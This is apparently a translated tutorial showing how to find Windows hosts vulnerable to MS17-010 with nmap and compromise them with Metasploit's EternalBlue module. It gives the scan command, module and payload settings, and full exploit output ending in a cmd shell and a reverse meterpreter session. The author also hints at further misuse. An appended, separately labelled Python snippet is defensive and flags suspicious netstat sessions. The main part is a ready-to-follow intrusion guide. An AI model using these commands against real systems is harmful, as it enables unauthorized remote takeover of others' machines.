EternalBlue = Metasploit + Nmap
Use Nmap to probe which hosts in the C-class range of the internal network 192.168.119.1 have port 445 open and are vulnerable to ms17-010:
nmap -p445 --script smb-vuln-ms17-010 192.168.1.1/24
Since my internal IP is 192.168.119.136, I use this command:
nmap -p445 --script smb-vuln-ms17-010 192.168.119.1/24
root@liuwx:~# nmap -p445 --script smb-vuln-ms17-010 192.168.119.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-10 21:10 CST
Nmap scan report for 192.168.119.1
Host is up (0.00053s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.119.2
Host is up (0.00014s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:50:56:E0:1A:4E (VMware)
Nmap scan report for 192.168.119.139
Host is up (0.00024s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:BF:20:28 (VMware)
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap scan report for 192.168.119.254
Host is up (0.00067s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:50:56:EF:68:01 (VMware)
Nmap scan report for 192.168.119.136
Host is up (0.000033s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.46 seconds
From the output above we can see that host 192.168.119.139 in the internal network has the ms17-010 vulnerability!
Go straight to the command:
use exploit/windows/smb/ms17_010_eternalblue
Set the target IP, then run:
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.119.136:4444
[+] 192.168.119.139:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.119.139:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Command shell session 4 opened (192.168.119.136:4444 -> 192.168.119.139:49169) at 2019-10-10 21:14:11 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Windows\system32>
EternalBlue exploited successfully! But what comes back is only a cmd shell, because the payload msf uses by default is payload/windows/x64/shell/reverse_tcp.
We can set a different payload:
set payload windows/x64/meterpreter/reverse_tcp
Once that is set, use show options to see which parameters need to be configured:
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.119.139 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.119.136 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Generally you only need to set rhosts and rport; msf fills in the rest for you automatically!
Finally, exploit and see what happens:
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.119.136:4444
[+] 192.168.119.139:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.119.139:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.119.139
[*] Meterpreter session 5 opened (192.168.119.136:4444 -> 192.168.119.139:49211) at 2019-10-10 21:24:40 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
As you can see, this time the session that comes back is a meterpreter session; as for what it can do, heh, you know~
The payload can also be set to a bind shell:
set payload windows/x64/meterpreter/bind_tcp
meterpreter > netstat -ano
Connection list
===============
Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 712/svchost.exe
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:5357 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:49152 0.0.0.0:* LISTEN 0 0 396/wininit.exe
tcp 0.0.0.0:49153 0.0.0.0:* LISTEN 0 0 764/svchost.exe
tcp 0.0.0.0:49154 0.0.0.0:* LISTEN 0 0 928/svchost.exe
tcp 0.0.0.0:49155 0.0.0.0:* LISTEN 0 0 496/services.exe
tcp 0.0.0.0:49156 0.0.0.0:* LISTEN 0 0 2028/svchost.exe
tcp 0.0.0.0:49157 0.0.0.0:* LISTEN 0 0 504/lsass.exe
tcp 192.168.119.139:139 0.0.0.0:* LISTEN 0 0 4/System
tcp 192.168.119.139:4444 192.168.119.136:45747 ESTABLISHED 0 0 1248/spoolsv.exe
tcp 192.168.119.139:49159 192.168.119.136:4444 ESTABLISHED 0 0 1248/spoolsv.exe
tcp 192.168.119.139:49187 118.112.253.1:80 ESTABLISHED 0 0 928/svchost.exe
tcp 192.168.119.139:49188 63.147.242.144:80 ESTABLISHED 0 0 928/svchost.exe
tcp 192.168.119.139:49189 51.143.111.81:80 SYN_SENT 0 0 648/wermgr.exe
tcp6 :::135 :::* LISTEN 0 0 712/svchost.exe
tcp6 :::445 :::* LISTEN 0 0 4/System
tcp6 :::5357 :::* LISTEN 0 0 4/System
tcp6 :::49152 :::* LISTEN 0 0 396/wininit.exe
tcp6 :::49153 :::* LISTEN 0 0 764/svchost.exe
tcp6 :::49154 :::* LISTEN 0 0 928/svchost.exe
tcp6 :::49155 :::* LISTEN 0 0 496/services.exe
tcp6 :::49156 :::* LISTEN 0 0 2028/svchost.exe
tcp6 :::49157 :::* LISTEN 0 0 504/lsass.exe
udp 0.0.0.0:500 0.0.0.0:* 0 0 928/svchost.exe
udp 0.0.0.0:3702 0.0.0.0:* 0 0 1576/svchost.exe
udp 0.0.0.0:3702 0.0.0.0:* 0 0 1576/svchost.exe
udp 0.0.0.0:4500 0.0.0.0:* 0 0 928/svchost.exe
udp 0.0.0.0:5355 0.0.0.0:* 0 0 984/svchost.exe
udp 0.0.0.0:61604 0.0.0.0:* 0 0 1576/svchost.exe
udp 127.0.0.1:1900 0.0.0.0:* 0 0 1576/svchost.exe
udp 127.0.0.1:65412 0.0.0.0:* 0 0 1576/svchost.exe
udp 192.168.119.139:137 0.0.0.0:* 0 0 4/System
udp 192.168.119.139:138 0.0.0.0:* 0 0 4/System
udp 192.168.119.139:1900 0.0.0.0:* 0 0 1576/svchost.exe
udp 192.168.119.139:65411 0.0.0.0:* 0 0 1576/svchost.exe
udp6 :::500 :::* 0 0 928/svchost.exe
udp6 :::3702 :::* 0 0 1576/svchost.exe
udp6 :::3702 :::* 0 0 1576/svchost.exe
udp6 :::4500 :::* 0 0 928/svchost.exe
udp6 :::5355 :::* 0 0 984/svchost.exe
udp6 :::61605 :::* 0 0 1576/svchost.exe
udp6 ::1:1900 :::* 0 0 1576/svchost.exe
udp6 ::1:65410 :::* 0 0 1576/svchost.exe
udp6 fe80::f50f:3929:7979:5c54:1900 :::* 0 0 1576/svchost.exe
udp6 fe80::f50f:3929:7979:5c54:65409 :::* 0 0 1576/svchost.exe
meterpreter >
Looking at the port and connection listing, you can see 192.168.119.139:4444 connected to 192.168.119.136:45747, and the process the session is injected into is spoolsv.exe.
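A defender-side counterpart to the netstat check above, as an added example (not from the original post): it parses netstat lines in the format shown and flags live TCP sessions held by Windows service processes that normally have no network peers, such as spoolsv.exe, or that touch Metasploit's default handler port 4444. The sample lines, the QUIET_PROCESSES allow-list and the port heuristic are assumptions constructed for this example.

```python
import re
from typing import List, Tuple

# Constructed sample in the layout of meterpreter's netstat output; the
# addresses mirror the lab above but this snapshot is illustrative only.
SAMPLE_NETSTAT = """\
tcp   0.0.0.0:445             0.0.0.0:*               LISTEN       0 0 4/System
tcp   192.168.119.139:4444    192.168.119.136:45747   ESTABLISHED  0 0 1248/spoolsv.exe
tcp   192.168.119.139:49159   192.168.119.136:4444    ESTABLISHED  0 0 1248/spoolsv.exe
tcp   192.168.119.139:49187   118.112.253.1:80        ESTABLISHED  0 0 928/svchost.exe
tcp   192.168.119.139:49189   51.143.111.81:80        SYN_SENT     0 0 648/wermgr.exe
"""

# Service processes that, on a typical workstation, should not hold their own
# TCP peer connections (assumed heuristic list; tune it for your environment).
QUIET_PROCESSES = {"spoolsv.exe", "wininit.exe", "services.exe", "winlogon.exe"}
# Metasploit's default handler port: a hint worth a look, not proof of anything.
SUSPECT_PORTS = {4444}

# proto, local, remote, optional state (UDP rows have none), user, inode, pid/prog
LINE_RE = re.compile(
    r"^(?P<proto>tcp6?|udp6?)\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+"
    r"(?P<state>[A-Z_]+)?\s*\d+\s+\d+\s+(?P<pid>\d+)/(?P<prog>\S+)$"
)


def split_port(addr: str) -> int:
    """Return the port of 'host:port' (IPv4 or IPv6); 0 for the wildcard '*'."""
    port = addr.rsplit(":", 1)[1]
    return 0 if port == "*" else int(port)


def find_suspicious(netstat_text: str) -> List[Tuple[str, str, str, str]]:
    """Return (prog, local, remote, reasons) for live sessions a defender should check."""
    findings = []
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or m.group("state") != "ESTABLISHED":
            continue  # only live TCP sessions matter for this check
        prog, local, remote = m.group("prog"), m.group("local"), m.group("remote")
        ports = {split_port(local), split_port(remote)}
        reasons = []
        if prog.lower() in QUIET_PROCESSES:
            reasons.append("service process holding a live TCP peer")
        if ports & SUSPECT_PORTS:
            reasons.append("port 4444 (Metasploit default handler port)")
        if reasons:
            findings.append((prog, local, remote, "; ".join(reasons)))
    return findings
```

On the sample both spoolsv.exe sessions are reported with both reasons, while the svchost.exe HTTP connection and the half-open wermgr.exe attempt are left alone.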